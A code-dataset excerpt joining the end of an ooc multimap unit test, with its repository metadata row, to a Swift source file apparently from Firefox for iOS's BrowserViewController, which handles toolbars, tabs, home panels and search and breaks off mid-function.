match res {
case list: List<String> =>
ensure(list size, 2, "list size")
ensure(list[0], "one", "list[0]")
ensure(list[1], "two", "list[1]")
case =>
"Fail: res is supposed to be a list!" println()
fails = true
}
map remove("a")
ensure(map size, 1, "map size")
ensure(map getKeys() size, 1, "map keys size")
ensure(map get("a"), "one")
map clear()
ensure(map contains?("a"), false)
ensure(map size, 0, "map size")
ensure(map getKeys() size, 0, "map keys size")
}
ensure: func ~str (a, b: String, desc := "") {
if (a != b) {
"Fail! '#{a}' should equal '#{b}' (#{desc})" println()
fails = true
}
}
ensure: func ~bool (a, b: Bool, desc := "") {
if (a != b) {
"Fail! '#{a}' should equal '#{b}' (#{desc})" println()
fails = true
}
}
ensure: func ~int (a, b: Int, desc := "") {
if (a != b) {
"Fail! '#{a}' should equal '#{b}' (#{desc})" println()
fails = true
}
}
| ooc | 4 | shamanas/rock | test/sdk/structs/multimap_test.ooc | [
"MIT"
] |
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
import Photos
import UIKit
import WebKit
import Shared
import Storage
import SnapKit
import XCGLogger
import Alamofire
import Account
import MobileCoreServices
import SDWebImage
import SwiftyJSON
import Telemetry
import Sentry
import Deferred
private let KVOs: [KVOConstants] = [
.estimatedProgress,
.loading,
.canGoBack,
.canGoForward,
.URL,
.title,
]
private let ActionSheetTitleMaxLength = 120
private struct BrowserViewControllerUX {
fileprivate static let ShowHeaderTapAreaHeight: CGFloat = 32
fileprivate static let BookmarkStarAnimationDuration: Double = 0.5
fileprivate static let BookmarkStarAnimationOffset: CGFloat = 80
}
class BrowserViewController: UIViewController {
var homePanelController: (UIViewController & Themeable)?
var libraryPanelController: HomePanelViewController?
var webViewContainer: UIView!
var urlBar: URLBarView!
var clipboardBarDisplayHandler: ClipboardBarDisplayHandler?
var readerModeBar: ReaderModeBarView?
var readerModeCache: ReaderModeCache
var statusBarOverlay: UIView!
fileprivate(set) var toolbar: TabToolbar?
var searchController: SearchViewController?
var screenshotHelper: ScreenshotHelper!
fileprivate var homePanelIsInline = false
fileprivate var searchLoader: SearchLoader?
let alertStackView = UIStackView() // All content that appears above the footer should be added to this view. (Find In Page/SnackBars)
var findInPageBar: FindInPageBar?
lazy var mailtoLinkHandler: MailtoLinkHandler = MailtoLinkHandler()
lazy fileprivate var customSearchEngineButton: UIButton = {
let searchButton = UIButton()
searchButton.setImage(UIImage(named: "AddSearch")?.withRenderingMode(.alwaysTemplate), for: [])
searchButton.addTarget(self, action: #selector(addCustomSearchEngineForFocusedElement), for: .touchUpInside)
searchButton.accessibilityIdentifier = "BrowserViewController.customSearchEngineButton"
return searchButton
}()
fileprivate var customSearchBarButton: UIBarButtonItem?
// popover rotation handling
var displayedPopoverController: UIViewController?
var updateDisplayedPopoverProperties: (() -> Void)?
var openInHelper: OpenInHelper?
// location label actions
fileprivate var pasteGoAction: AccessibleAction!
fileprivate var pasteAction: AccessibleAction!
fileprivate var copyAddressAction: AccessibleAction!
fileprivate weak var tabTrayController: TabTrayController?
let profile: Profile
let tabManager: TabManager
// These views wrap the urlbar and toolbar to provide background effects on them
var header: UIView!
var footer: UIView!
fileprivate var topTouchArea: UIButton!
let urlBarTopTabsContainer = UIView(frame: CGRect.zero)
var topTabsVisible: Bool {
return topTabsViewController != nil
}
// Backdrop used for displaying greyed background for private tabs
var webViewContainerBackdrop: UIView!
var scrollController = TabScrollingController()
fileprivate var keyboardState: KeyboardState?
var pendingToast: Toast? // A toast that might be waiting for BVC to appear before displaying
var downloadToast: DownloadToast? // A toast that is showing the combined download progress
// Tracking navigation items to record history types.
// TODO: weak references?
var ignoredNavigation = Set<WKNavigation>()
var typedNavigation = [WKNavigation: VisitType]()
var navigationToolbar: TabToolbarProtocol {
return toolbar ?? urlBar
}
var topTabsViewController: TopTabsViewController?
let topTabsContainer = UIView()
// Keep track of allowed `URLRequest`s from `webView(_:decidePolicyFor:decisionHandler:)` so
// that we can obtain the originating `URLRequest` when a `URLResponse` is received. This will
// allow us to re-trigger the `URLRequest` if the user requests a file to be downloaded.
var pendingRequests = [String: URLRequest]()
// This is set when the user taps "Download Link" from the context menu. We then force a
// download of the next request through the `WKNavigationDelegate` that matches this web view.
weak var pendingDownloadWebView: WKWebView?
let downloadQueue = DownloadQueue()
init(profile: Profile, tabManager: TabManager) {
self.profile = profile
self.tabManager = tabManager
self.readerModeCache = DiskReaderModeCache.sharedInstance
super.init(nibName: nil, bundle: nil)
didInit()
}
required init?(coder aDecoder: NSCoder) {
fatalError("init(coder:) has not been implemented")
}
override var supportedInterfaceOrientations: UIInterfaceOrientationMask {
if UIDevice.current.userInterfaceIdiom == .phone {
return .allButUpsideDown
} else {
return .all
}
}
override func viewWillTransition(to size: CGSize, with coordinator: UIViewControllerTransitionCoordinator) {
super.viewWillTransition(to: size, with: coordinator)
dismissVisibleMenus()
coordinator.animate(alongsideTransition: { context in
self.scrollController.updateMinimumZoom()
self.topTabsViewController?.scrollToCurrentTab(false, centerCell: false)
if let popover = self.displayedPopoverController {
self.updateDisplayedPopoverProperties?()
self.present(popover, animated: true, completion: nil)
}
}, completion: { _ in
self.scrollController.setMinimumZoom()
})
}
override func didReceiveMemoryWarning() {
super.didReceiveMemoryWarning()
}
fileprivate func didInit() {
screenshotHelper = ScreenshotHelper(controller: self)
tabManager.addDelegate(self)
tabManager.addNavigationDelegate(self)
downloadQueue.delegate = self
NotificationCenter.default.addObserver(self, selector: #selector(displayThemeChanged), name: .DisplayThemeChanged, object: nil)
}
override var preferredStatusBarStyle: UIStatusBarStyle {
return ThemeManager.instance.statusBarStyle
}
@objc func displayThemeChanged(notification: Notification) {
applyTheme()
}
func shouldShowFooterForTraitCollection(_ previousTraitCollection: UITraitCollection) -> Bool {
return previousTraitCollection.verticalSizeClass != .compact && previousTraitCollection.horizontalSizeClass != .regular
}
func shouldShowTopTabsForTraitCollection(_ newTraitCollection: UITraitCollection) -> Bool {
return newTraitCollection.verticalSizeClass == .regular && newTraitCollection.horizontalSizeClass == .regular
}
func toggleSnackBarVisibility(show: Bool) {
if show {
UIView.animate(withDuration: 0.1, animations: { self.alertStackView.isHidden = false })
} else {
alertStackView.isHidden = true
}
}
fileprivate func updateToolbarStateForTraitCollection(_ newCollection: UITraitCollection, withTransitionCoordinator coordinator: UIViewControllerTransitionCoordinator? = nil) {
let showToolbar = shouldShowFooterForTraitCollection(newCollection)
let showTopTabs = shouldShowTopTabsForTraitCollection(newCollection)
urlBar.topTabsIsShowing = showTopTabs
urlBar.setShowToolbar(!showToolbar)
toolbar?.removeFromSuperview()
toolbar?.tabToolbarDelegate = nil
toolbar = nil
if showToolbar {
toolbar = TabToolbar()
footer.addSubview(toolbar!)
toolbar?.tabToolbarDelegate = self
toolbar?.applyUIMode(isPrivate: tabManager.selectedTab?.isPrivate ?? false)
toolbar?.applyTheme()
updateTabCountUsingTabManager(self.tabManager)
}
if showTopTabs {
if topTabsViewController == nil {
let topTabsViewController = TopTabsViewController(tabManager: tabManager)
topTabsViewController.delegate = self
addChildViewController(topTabsViewController)
topTabsViewController.view.frame = topTabsContainer.frame
topTabsContainer.addSubview(topTabsViewController.view)
topTabsViewController.view.snp.makeConstraints { make in
make.edges.equalTo(topTabsContainer)
make.height.equalTo(TopTabsUX.TopTabsViewHeight)
}
self.topTabsViewController = topTabsViewController
topTabsViewController.applyTheme()
}
topTabsContainer.snp.updateConstraints { make in
make.height.equalTo(TopTabsUX.TopTabsViewHeight)
}
} else {
topTabsContainer.snp.updateConstraints { make in
make.height.equalTo(0)
}
topTabsViewController?.view.removeFromSuperview()
topTabsViewController?.removeFromParentViewController()
topTabsViewController = nil
}
view.setNeedsUpdateConstraints()
if let home = homePanelController {
home.view.setNeedsUpdateConstraints()
}
if let tab = tabManager.selectedTab,
let webView = tab.webView {
updateURLBarDisplayURL(tab)
navigationToolbar.updateBackStatus(webView.canGoBack)
navigationToolbar.updateForwardStatus(webView.canGoForward)
navigationToolbar.updateReloadStatus(tab.loading)
}
}
override func willTransition(to newCollection: UITraitCollection, with coordinator: UIViewControllerTransitionCoordinator) {
super.willTransition(to: newCollection, with: coordinator)
// During split screen launching on iPad, this callback gets fired before viewDidLoad gets a chance to
// set things up. Make sure to only update the toolbar state if the view is ready for it.
if isViewLoaded {
updateToolbarStateForTraitCollection(newCollection, withTransitionCoordinator: coordinator)
}
displayedPopoverController?.dismiss(animated: true, completion: nil)
coordinator.animate(alongsideTransition: { context in
self.scrollController.showToolbars(animated: false)
if self.isViewLoaded {
self.statusBarOverlay.backgroundColor = self.shouldShowTopTabsForTraitCollection(self.traitCollection) ? UIColor.Photon.Grey80 : self.urlBar.backgroundColor
self.setNeedsStatusBarAppearanceUpdate()
}
}, completion: nil)
}
func dismissVisibleMenus() {
displayedPopoverController?.dismiss(animated: true)
if let _ = self.presentedViewController as? PhotonActionSheet {
self.presentedViewController?.dismiss(animated: true, completion: nil)
}
}
@objc func appDidEnterBackgroundNotification() {
displayedPopoverController?.dismiss(animated: false) {
self.displayedPopoverController = nil
}
}
@objc func tappedTopArea() {
scrollController.showToolbars(animated: true)
}
@objc func appWillResignActiveNotification() {
// Dismiss any popovers that might be visible
displayedPopoverController?.dismiss(animated: false) {
self.displayedPopoverController = nil
}
// If we are displying a private tab, hide any elements in the tab that we wouldn't want shown
// when the app is in the home switcher
guard let privateTab = tabManager.selectedTab, privateTab.isPrivate else {
return
}
webViewContainerBackdrop.alpha = 1
webViewContainer.alpha = 0
urlBar.locationContainer.alpha = 0
topTabsViewController?.switchForegroundStatus(isInForeground: false)
presentedViewController?.popoverPresentationController?.containerView?.alpha = 0
presentedViewController?.view.alpha = 0
}
@objc func appDidBecomeActiveNotification() {
// Re-show any components that might have been hidden because they were being displayed
// as part of a private mode tab
UIView.animate(withDuration: 0.2, delay: 0, options: UIViewAnimationOptions(), animations: {
self.webViewContainer.alpha = 1
self.urlBar.locationContainer.alpha = 1
self.topTabsViewController?.switchForegroundStatus(isInForeground: true)
self.presentedViewController?.popoverPresentationController?.containerView?.alpha = 1
self.presentedViewController?.view.alpha = 1
self.view.backgroundColor = UIColor.clear
}, completion: { _ in
self.webViewContainerBackdrop.alpha = 0
})
// Re-show toolbar which might have been hidden during scrolling (prior to app moving into the background)
scrollController.showToolbars(animated: false)
}
override func viewDidLoad() {
super.viewDidLoad()
NotificationCenter.default.addObserver(self, selector: #selector(appWillResignActiveNotification), name: .UIApplicationWillResignActive, object: nil)
NotificationCenter.default.addObserver(self, selector: #selector(appDidBecomeActiveNotification), name: .UIApplicationDidBecomeActive, object: nil)
NotificationCenter.default.addObserver(self, selector: #selector(appDidEnterBackgroundNotification), name: .UIApplicationDidEnterBackground, object: nil)
KeyboardHelper.defaultHelper.addDelegate(self)
webViewContainerBackdrop = UIView()
webViewContainerBackdrop.backgroundColor = UIColor.Photon.Grey50
webViewContainerBackdrop.alpha = 0
view.addSubview(webViewContainerBackdrop)
webViewContainer = UIView()
view.addSubview(webViewContainer)
// Temporary work around for covering the non-clipped web view content
statusBarOverlay = UIView()
view.addSubview(statusBarOverlay)
topTouchArea = UIButton()
topTouchArea.isAccessibilityElement = false
topTouchArea.addTarget(self, action: #selector(tappedTopArea), for: .touchUpInside)
view.addSubview(topTouchArea)
// Setup the URL bar, wrapped in a view to get transparency effect
urlBar = URLBarView()
urlBar.translatesAutoresizingMaskIntoConstraints = false
urlBar.delegate = self
urlBar.tabToolbarDelegate = self
header = urlBarTopTabsContainer
urlBarTopTabsContainer.addSubview(urlBar)
urlBarTopTabsContainer.addSubview(topTabsContainer)
view.addSubview(header)
// UIAccessibilityCustomAction subclass holding an AccessibleAction instance does not work, thus unable to generate AccessibleActions and UIAccessibilityCustomActions "on-demand" and need to make them "persistent" e.g. by being stored in BVC
pasteGoAction = AccessibleAction(name: Strings.PasteAndGoTitle, handler: { () -> Bool in
if let pasteboardContents = UIPasteboard.general.string {
self.urlBar(self.urlBar, didSubmitText: pasteboardContents)
return true
}
return false
})
pasteAction = AccessibleAction(name: Strings.PasteTitle, handler: { () -> Bool in
if let pasteboardContents = UIPasteboard.general.string {
// Enter overlay mode and make the search controller appear.
self.urlBar.enterOverlayMode(pasteboardContents, pasted: true, search: true)
return true
}
return false
})
copyAddressAction = AccessibleAction(name: Strings.CopyAddressTitle, handler: { () -> Bool in
if let url = self.tabManager.selectedTab?.canonicalURL?.displayURL ?? self.urlBar.currentURL {
UIPasteboard.general.url = url
}
return true
})
view.addSubview(alertStackView)
footer = UIView()
view.addSubview(footer)
alertStackView.axis = .vertical
alertStackView.alignment = .center
clipboardBarDisplayHandler = ClipboardBarDisplayHandler(prefs: profile.prefs, tabManager: tabManager)
clipboardBarDisplayHandler?.delegate = self
scrollController.urlBar = urlBar
scrollController.readerModeBar = readerModeBar
scrollController.header = header
scrollController.footer = footer
scrollController.snackBars = alertStackView
self.updateToolbarStateForTraitCollection(self.traitCollection)
setupConstraints()
// Setup UIDropInteraction to handle dragging and dropping
// links into the view from other apps.
let dropInteraction = UIDropInteraction(delegate: self)
view.addInteraction(dropInteraction)
}
fileprivate func setupConstraints() {
topTabsContainer.snp.makeConstraints { make in
make.leading.trailing.equalTo(self.header)
make.top.equalTo(urlBarTopTabsContainer)
}
urlBar.snp.makeConstraints { make in
make.leading.trailing.bottom.equalTo(urlBarTopTabsContainer)
make.height.equalTo(UIConstants.TopToolbarHeight)
make.top.equalTo(topTabsContainer.snp.bottom)
}
header.snp.makeConstraints { make in
scrollController.headerTopConstraint = make.top.equalTo(self.topLayoutGuide.snp.bottom).constraint
make.left.right.equalTo(self.view)
}
webViewContainerBackdrop.snp.makeConstraints { make in
make.edges.equalTo(webViewContainer)
}
}
override func viewDidLayoutSubviews() {
super.viewDidLayoutSubviews()
statusBarOverlay.snp.remakeConstraints { make in
make.top.left.right.equalTo(self.view)
make.height.equalTo(self.topLayoutGuide.length)
}
}
override var canBecomeFirstResponder: Bool {
return true
}
override func becomeFirstResponder() -> Bool {
// Make the web view the first responder so that it can show the selection menu.
return tabManager.selectedTab?.webView?.becomeFirstResponder() ?? false
}
func loadQueuedTabs(receivedURLs: [URL]? = nil) {
// Chain off of a trivial deferred in order to run on the background queue.
succeed().upon() { res in
self.dequeueQueuedTabs(receivedURLs: receivedURLs ?? [])
}
}
fileprivate func dequeueQueuedTabs(receivedURLs: [URL]) {
assert(!Thread.current.isMainThread, "This must be called in the background.")
self.profile.queue.getQueuedTabs() >>== { cursor in
// This assumes that the DB returns rows in some kind of sane order.
// It does in practice, so WFM.
if cursor.count > 0 {
// Filter out any tabs received by a push notification to prevent dupes.
let urls = cursor.compactMap { $0?.url.asURL }.filter { !receivedURLs.contains($0) }
if !urls.isEmpty {
DispatchQueue.main.async {
self.tabManager.addTabsForURLs(urls, zombie: false)
}
}
// Clear *after* making an attempt to open. We're making a bet that
// it's better to run the risk of perhaps opening twice on a crash,
// rather than losing data.
self.profile.queue.clearQueuedTabs()
}
// Then, open any received URLs from push notifications.
if !receivedURLs.isEmpty {
DispatchQueue.main.async {
self.tabManager.addTabsForURLs(receivedURLs, zombie: false)
if let lastURL = receivedURLs.last, let tab = self.tabManager.getTabForURL(lastURL) {
self.tabManager.selectTab(tab)
}
}
}
}
}
// Because crashedLastLaunch is sticky, it does not get reset, we need to remember its
// value so that we do not keep asking the user to restore their tabs.
var displayedRestoreTabsAlert = false
override func viewWillAppear(_ animated: Bool) {
super.viewWillAppear(animated)
// On iPhone, if we are about to show the On-Boarding, blank out the tab so that it does
// not flash before we present. This change of alpha also participates in the animation when
// the intro view is dismissed.
if UIDevice.current.userInterfaceIdiom == .phone {
self.view.alpha = (profile.prefs.intForKey(PrefsKeys.IntroSeen) != nil) ? 1.0 : 0.0
}
if !displayedRestoreTabsAlert && !cleanlyBackgrounded() && crashedLastLaunch() {
displayedRestoreTabsAlert = true
showRestoreTabsAlert()
} else {
tabManager.restoreTabs()
}
updateTabCountUsingTabManager(tabManager, animated: false)
clipboardBarDisplayHandler?.checkIfShouldDisplayBar()
}
fileprivate func crashedLastLaunch() -> Bool {
return Sentry.crashedLastLaunch
}
fileprivate func cleanlyBackgrounded() -> Bool {
guard let appDelegate = UIApplication.shared.delegate as? AppDelegate else {
return false
}
return appDelegate.applicationCleanlyBackgrounded
}
fileprivate func showRestoreTabsAlert() {
guard tabManager.hasTabsToRestoreAtStartup() else {
tabManager.selectTab(tabManager.addTab())
return
}
let alert = UIAlertController.restoreTabsAlert(
okayCallback: { _ in
self.tabManager.restoreTabs()
},
noCallback: { _ in
self.tabManager.selectTab(self.tabManager.addTab())
}
)
self.present(alert, animated: true, completion: nil)
}
override func viewDidAppear(_ animated: Bool) {
presentIntroViewController()
screenshotHelper.viewIsVisible = true
screenshotHelper.takePendingScreenshots(tabManager.tabs)
super.viewDidAppear(animated)
if shouldShowWhatsNewTab() {
// Only display if the SUMO topic has been configured in the Info.plist (present and not empty)
if let whatsNewTopic = AppInfo.whatsNewTopic, whatsNewTopic != "" {
if let whatsNewURL = SupportUtils.URLForTopic(whatsNewTopic) {
self.openURLInNewTab(whatsNewURL, isPrivileged: false)
profile.prefs.setString(AppInfo.appVersion, forKey: LatestAppVersionProfileKey)
}
}
}
if let toast = self.pendingToast {
self.pendingToast = nil
show(toast: toast, afterWaiting: ButtonToastUX.ToastDelay)
}
showQueuedAlertIfAvailable()
}
// THe logic for shouldShowWhatsNewTab is as follows: If we do not have the LatestAppVersionProfileKey in
// the profile, that means that this is a fresh install and we do not show the What's New. If we do have
// that value, we compare it to the major version of the running app. If it is different then this is an
// upgrade, downgrades are not possible, so we can show the What's New page.
fileprivate func shouldShowWhatsNewTab() -> Bool {
guard let latestMajorAppVersion = profile.prefs.stringForKey(LatestAppVersionProfileKey)?.components(separatedBy: ".").first else {
return false // Clean install, never show What's New
}
return latestMajorAppVersion != AppInfo.majorAppVersion && DeviceInfo.hasConnectivity()
}
fileprivate func showQueuedAlertIfAvailable() {
if let queuedAlertInfo = tabManager.selectedTab?.dequeueJavascriptAlertPrompt() {
let alertController = queuedAlertInfo.alertController()
alertController.delegate = self
present(alertController, animated: true, completion: nil)
}
}
override func viewWillDisappear(_ animated: Bool) {
screenshotHelper.viewIsVisible = false
super.viewWillDisappear(animated)
}
override func viewDidDisappear(_ animated: Bool) {
super.viewDidDisappear(animated)
}
func resetBrowserChrome() {
// animate and reset transform for tab chrome
urlBar.updateAlphaForSubviews(1)
footer.alpha = 1
[header, footer, readerModeBar].forEach { view in
view?.transform = .identity
}
statusBarOverlay.isHidden = false
}
override func updateViewConstraints() {
super.updateViewConstraints()
topTouchArea.snp.remakeConstraints { make in
make.top.left.right.equalTo(self.view)
make.height.equalTo(BrowserViewControllerUX.ShowHeaderTapAreaHeight)
}
readerModeBar?.snp.remakeConstraints { make in
make.top.equalTo(self.header.snp.bottom)
make.height.equalTo(UIConstants.ToolbarHeight)
make.leading.trailing.equalTo(self.view)
}
webViewContainer.snp.remakeConstraints { make in
make.left.right.equalTo(self.view)
if let readerModeBarBottom = readerModeBar?.snp.bottom {
make.top.equalTo(readerModeBarBottom)
} else {
make.top.equalTo(self.header.snp.bottom)
}
let findInPageHeight = (findInPageBar == nil) ? 0 : UIConstants.ToolbarHeight
if let toolbar = self.toolbar {
make.bottom.equalTo(toolbar.snp.top).offset(-findInPageHeight)
} else {
make.bottom.equalTo(self.view).offset(-findInPageHeight)
}
}
// Setup the bottom toolbar
toolbar?.snp.remakeConstraints { make in
make.edges.equalTo(self.footer)
make.height.equalTo(UIConstants.BottomToolbarHeight)
}
footer.snp.remakeConstraints { make in
scrollController.footerBottomConstraint = make.bottom.equalTo(self.view.snp.bottom).constraint
make.leading.trailing.equalTo(self.view)
}
urlBar.setNeedsUpdateConstraints()
// Remake constraints even if we're already showing the home controller.
// The home controller may change sizes if we tap the URL bar while on about:home.
homePanelController?.view.snp.remakeConstraints { make in
make.top.equalTo(self.urlBar.snp.bottom)
make.left.right.equalTo(self.view)
if self.homePanelIsInline {
make.bottom.equalTo(self.toolbar?.snp.top ?? self.view.snp.bottom)
} else {
make.bottom.equalTo(self.view.snp.bottom)
}
}
alertStackView.snp.remakeConstraints { make in
make.centerX.equalTo(self.view)
make.width.equalTo(self.view.safeArea.width)
if let keyboardHeight = keyboardState?.intersectionHeightForView(self.view), keyboardHeight > 0 {
make.bottom.equalTo(self.view).offset(-keyboardHeight)
} else if let toolbar = self.toolbar {
make.bottom.equalTo(toolbar.snp.top)
make.bottom.lessThanOrEqualTo(self.view.safeArea.bottom)
} else {
make.bottom.equalTo(self.view)
}
}
}
fileprivate func showHomePanelController(inline: Bool) {
homePanelIsInline = inline
if homePanelController == nil {
var homePanelVC: (UIViewController & HomePanel)?
let currentChoice = NewTabAccessors.getNewTabPage(self.profile.prefs)
switch currentChoice {
case .topSites:
homePanelVC = ActivityStreamPanel(profile: profile)
case .bookmarks:
homePanelVC = BookmarksPanel(profile: profile)
case .history:
homePanelVC = HistoryPanel(profile: profile)
case .readingList:
homePanelVC = ReadingListPanel(profile: profile)
default:
break
}
if let vc = homePanelVC {
let navController = ThemedNavigationController(rootViewController: vc)
navController.setNavigationBarHidden(true, animated: false)
navController.interactivePopGestureRecognizer?.delegate = nil
navController.view.alpha = 0
self.homePanelController = navController
vc.homePanelDelegate = self
addChildViewController(navController)
view.addSubview(navController.view)
vc.didMove(toParentViewController: self)
}
}
guard let homePanelController = self.homePanelController else {
return
}
homePanelController.applyTheme()
// We have to run this animation, even if the view is already showing because there may be a hide animation running
// and we want to be sure to override its results.
UIView.animate(withDuration: 0.2, animations: { () -> Void in
homePanelController.view.alpha = 1
}, completion: { finished in
if finished {
self.webViewContainer.accessibilityElementsHidden = true
UIAccessibilityPostNotification(UIAccessibilityScreenChangedNotification, nil)
}
})
view.setNeedsUpdateConstraints()
}
fileprivate func hideHomePanelController() {
if let controller = homePanelController {
self.homePanelController = nil
UIView.animate(withDuration: 0.2, delay: 0, options: .beginFromCurrentState, animations: { () -> Void in
controller.view.alpha = 0
}, completion: { _ in
controller.willMove(toParentViewController: nil)
controller.view.removeFromSuperview()
controller.removeFromParentViewController()
self.webViewContainer.accessibilityElementsHidden = false
UIAccessibilityPostNotification(UIAccessibilityScreenChangedNotification, nil)
// Refresh the reading view toolbar since the article record may have changed
if let readerMode = self.tabManager.selectedTab?.getContentScript(name: ReaderMode.name()) as? ReaderMode, readerMode.state == .active {
self.showReaderModeBar(animated: false)
}
})
}
}
fileprivate func updateInContentHomePanel(_ url: URL?) {
if !urlBar.inOverlayMode {
guard let url = url else {
hideHomePanelController()
return
}
if url.isAboutHomeURL {
showHomePanelController(inline: true)
} else if url.isErrorPageURL || !url.isLocalUtility || url.isReaderModeURL {
hideHomePanelController()
}
} else if url?.isAboutHomeURL ?? false {
showHomePanelController(inline: false)
}
}
fileprivate func showSearchController() {
if searchController != nil {
return
}
let isPrivate = tabManager.selectedTab?.isPrivate ?? false
searchController = SearchViewController(profile: profile, isPrivate: isPrivate)
searchController!.searchEngines = profile.searchEngines
searchController!.searchDelegate = self
searchLoader = SearchLoader(profile: profile, urlBar: urlBar)
searchLoader?.addListener(searchController!)
addChildViewController(searchController!)
view.addSubview(searchController!.view)
searchController!.view.snp.makeConstraints { make in
make.top.equalTo(self.urlBar.snp.bottom)
make.left.right.bottom.equalTo(self.view)
return
}
homePanelController?.view?.isHidden = true
searchController!.didMove(toParentViewController: self)
}
fileprivate func hideSearchController() {
if let searchController = searchController {
searchController.willMove(toParentViewController: nil)
searchController.view.removeFromSuperview()
searchController.removeFromParentViewController()
self.searchController = nil
homePanelController?.view?.isHidden = false
searchLoader = nil
}
}
func finishEditingAndSubmit(_ url: URL, visitType: VisitType, forTab tab: Tab) {
urlBar.currentURL = url
urlBar.leaveOverlayMode()
if let webView = tab.webView {
resetSpoofedUserAgentIfRequired(webView, newURL: url)
}
if let nav = tab.loadRequest(PrivilegedRequest(url: url) as URLRequest) {
self.recordNavigationInTab(tab, navigation: nav, visitType: visitType)
}
}
func addBookmark(_ tabState: TabState) {
guard let url = tabState.url else { return }
let absoluteString = url.absoluteString
let shareItem = ShareItem(url: absoluteString, title: tabState.title, favicon: tabState.favicon)
_ = profile.bookmarks.shareItem(shareItem)
var userData = [QuickActions.TabURLKey: shareItem.url]
if let title = shareItem.title {
userData[QuickActions.TabTitleKey] = title
}
QuickActions.sharedInstance.addDynamicApplicationShortcutItemOfType(.openLastBookmark,
withUserData: userData,
toApplication: UIApplication.shared)
}
override func accessibilityPerformEscape() -> Bool {
if urlBar.inOverlayMode {
urlBar.didClickCancel()
return true
} else if let selectedTab = tabManager.selectedTab, selectedTab.canGoBack {
selectedTab.goBack()
return true
}
return false
}
override func observeValue(forKeyPath keyPath: String?, of object: Any?, change: [NSKeyValueChangeKey: Any]?, context: UnsafeMutableRawPointer?) {
guard let webView = object as? WKWebView else {
assert(false)
return
}
guard let kp = keyPath, let path = KVOConstants(rawValue: kp) else {
assertionFailure("Unhandled KVO key: \(keyPath ?? "nil")")
return
}
switch path {
case .estimatedProgress:
guard webView == tabManager.selectedTab?.webView else { break }
if !(webView.url?.isLocalUtility ?? false) {
urlBar.updateProgressBar(Float(webView.estimatedProgress))
// Profiler.end triggers a screenshot, and a delay is needed here to capture the correct screen
// (otherwise the screen prior to this step completing is captured).
if webView.estimatedProgress > 0.9 {
Profiler.shared?.end(bookend: .load_url, delay: 0.200)
}
} else {
urlBar.hideProgressBar()
}
case .loading:
guard let loading = change?[.newKey] as? Bool else { break }
if webView == tabManager.selectedTab?.webView {
navigationToolbar.updateReloadStatus(loading)
}
if !loading {
runScriptsOnWebView(webView)
}
case .URL:
guard let tab = tabManager[webView] else { break }
// To prevent spoofing, only change the URL immediately if the new URL is on
// the same origin as the current URL. Otherwise, do nothing and wait for
// didCommitNavigation to confirm the page load.
if tab.url?.origin == webView.url?.origin {
tab.url = webView.url
if tab === tabManager.selectedTab && !tab.restoring {
updateUIForReaderHomeStateForTab(tab)
}
}
case .title:
guard let tab = tabManager[webView] else { break }
// Ensure that the tab title *actually* changed to prevent repeated calls
// to navigateInTab(tab:).
guard let title = tab.title else { break }
if !title.isEmpty && title != tab.lastTitle {
navigateInTab(tab: tab)
}
case .canGoBack:
guard webView == tabManager.selectedTab?.webView,
let canGoBack = change?[.newKey] as? Bool else { break }
navigationToolbar.updateBackStatus(canGoBack)
case .canGoForward:
guard webView == tabManager.selectedTab?.webView,
let canGoForward = change?[.newKey] as? Bool else { break }
navigationToolbar.updateForwardStatus(canGoForward)
default:
assertionFailure("Unhandled KVO key: \(keyPath ?? "nil")")
}
}
fileprivate func runScriptsOnWebView(_ webView: WKWebView) {
guard let url = webView.url, url.isWebPage(), !url.isLocal else {
return
}
if NoImageModeHelper.isActivated(profile.prefs) {
webView.evaluateJavaScript("__firefox__.NoImageMode.setEnabled(true)", completionHandler: nil)
}
}
func updateUIForReaderHomeStateForTab(_ tab: Tab) {
updateURLBarDisplayURL(tab)
scrollController.showToolbars(animated: false)
if let url = tab.url {
if url.isReaderModeURL {
showReaderModeBar(animated: false)
NotificationCenter.default.addObserver(self, selector: #selector(dynamicFontChanged), name: .DynamicFontChanged, object: nil)
} else {
hideReaderModeBar(animated: false)
NotificationCenter.default.removeObserver(self, name: .DynamicFontChanged, object: nil)
}
updateInContentHomePanel(url as URL)
}
}
/// Updates the URL bar text and button states.
/// Call this whenever the page URL changes.
fileprivate func updateURLBarDisplayURL(_ tab: Tab) {
urlBar.currentURL = tab.url?.displayURL
let isPage = tab.url?.displayURL?.isWebPage() ?? false
navigationToolbar.updatePageStatus(isPage)
}
// MARK: Opening New Tabs
func switchToPrivacyMode(isPrivate: Bool) {
if let tabTrayController = self.tabTrayController, tabTrayController.tabDisplayManager.isPrivate != isPrivate {
tabTrayController.changePrivacyMode(isPrivate)
}
topTabsViewController?.applyUIMode(isPrivate: isPrivate)
}
func switchToTabForURLOrOpen(_ url: URL, isPrivate: Bool = false, isPrivileged: Bool) {
popToBVC()
if let tab = tabManager.getTabForURL(url) {
tabManager.selectTab(tab)
} else {
openURLInNewTab(url, isPrivate: isPrivate, isPrivileged: isPrivileged)
}
}
func openURLInNewTab(_ url: URL?, isPrivate: Bool = false, isPrivileged: Bool) {
if let selectedTab = tabManager.selectedTab {
screenshotHelper.takeScreenshot(selectedTab)
}
let request: URLRequest?
if let url = url {
request = isPrivileged ? PrivilegedRequest(url: url) as URLRequest : URLRequest(url: url)
} else {
request = nil
}
switchToPrivacyMode(isPrivate: isPrivate)
tabManager.selectTab(tabManager.addTab(request, isPrivate: isPrivate))
}
func focusLocationTextField(forTab tab: Tab?, setSearchText searchText: String? = nil) {
DispatchQueue.main.asyncAfter(deadline: .now() + .milliseconds(300)) {
// Without a delay, the text field fails to become first responder
// Check that the newly created tab is still selected.
// This let's the user spam the Cmd+T button without lots of responder changes.
guard tab == self.tabManager.selectedTab else { return }
self.urlBar.tabLocationViewDidTapLocation(self.urlBar.locationView)
if let text = searchText {
self.urlBar.setLocation(text, search: true)
}
}
}
func openBlankNewTab(focusLocationField: Bool, isPrivate: Bool = false, searchFor searchText: String? = nil) {
popToBVC()
openURLInNewTab(nil, isPrivate: isPrivate, isPrivileged: true)
let freshTab = tabManager.selectedTab
if focusLocationField {
focusLocationTextField(forTab: freshTab, setSearchText: searchText)
}
}
func openSearchNewTab(isPrivate: Bool = false, _ text: String) {
popToBVC()
let engine = profile.searchEngines.defaultEngine
if let searchURL = engine.searchURLForQuery(text) {
openURLInNewTab(searchURL, isPrivate: isPrivate, isPrivileged: true)
} else {
// We still don't have a valid URL, so something is broken. Give up.
print("Error handling URL entry: \"\(text)\".")
assertionFailure("Couldn't generate search URL: \(text)")
}
